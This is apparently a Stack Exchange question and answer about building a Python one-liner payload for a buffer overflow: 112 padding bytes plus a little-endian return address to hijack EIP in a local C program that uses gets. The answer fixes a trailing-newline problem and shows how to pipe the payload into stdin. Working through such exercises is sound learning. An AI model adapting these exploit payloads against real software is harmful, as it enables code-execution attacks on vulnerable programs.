How to generate payload with python for buffer overflow?

Question

I'm trying to provoke a buffer overflow in order to execute a function on C code. So far I already managed to find out what is the number of bytes to take over EBP register. The only thing next is to substitute the address of EIP to the function I wish to execute. I'm trying to generate this payload with python. For this I use the following

python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload

This is what I get

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;�

Notice those last characters! I know that it's not what I was suppose to get. The address I wish to run on EIP register is 0804863b. I had to put this on little endian for the exploit to run properly. Any comments on this? Not being able to go further with the exploit because of this...

If you remove the `> attack_payload` is EIP successfully overwritten with your requested address? — DKNUCKLES, Oct 08 '17 at 18:39
@DKNUCKLES not sure how I would do that, without copying the file's content, because the code is expecting some input (string) to feed `gets` function. — fish202, Oct 08 '17 at 21:14

score 2 · Answer 1 · answered Oct 08 '17 at 18:53

2

I have no idea how you looked at your attack_payload file. But you should not just dump it to the terminal or look at it within some editor - since in this case the data will be interpreted as characters. Instead you should do some hexdump of the file, for example with xxd:

$ python -c 'print "A"*112 + "\x3b\x86\x04\x08"'  > attack_payload
$ xxd attack_payload 
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
...
00000060: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000070: 3b86 0408 0a                             ;....

As you can see in the last line, the bytes \x3b\x86\x04\x08 are actually mostly where you expected these. You probably did not expect the newline character \x0a (i.e. \n) at the end of the file but that's what a print in python adds. If you don't want this don't use print but:

$ python -c 'import sys; sys.stdout.write("A"*112 + "\x3b\x86\x04\x08")'  > attack_payload

answered Oct 08 '17 at 18:53

Steffen Ullrich

114,247
10
131
172

I just cat the file and copied those chars into stdin (because a gets function is asking for a string on the program). I've seen this procedure in some tutorials. As an example, the output should look like this `A(...)A<84>^D^H` when that command is executed. But what you're saying makes sense to me... Given that, are there anyways to deliver this payload to the `gets` function and overflow the buffer? – fish202 Oct 08 '17 at 20:50
@fish202: if the application reads with gets from stdin just `app < attack_payload` or `python -c '.... ' | app`. But that's not really a security question but instead just how to feed data to applications stdin. – Steffen Ullrich Oct 08 '17 at 22:17
Sure, but I can't feed it directly like that. Please follow the [link](https://pastebin.com/tv7zyvF0) to the code. – fish202 Oct 08 '17 at 22:36
@fish202: I would suggest that the problem is that the `gets` in `stringLength` gets only called if the correct option was selected - and your attack sequence does not account for selecting the option. Anyway, I've showed you what the problem is with creating the payload you want. Debugging your code and showing that the payload you've wanted is wrong in the first place is outside of this question. – Steffen Ullrich Oct 09 '17 at 04:52

How to generate payload with python for buffer overflow?

1 Answers1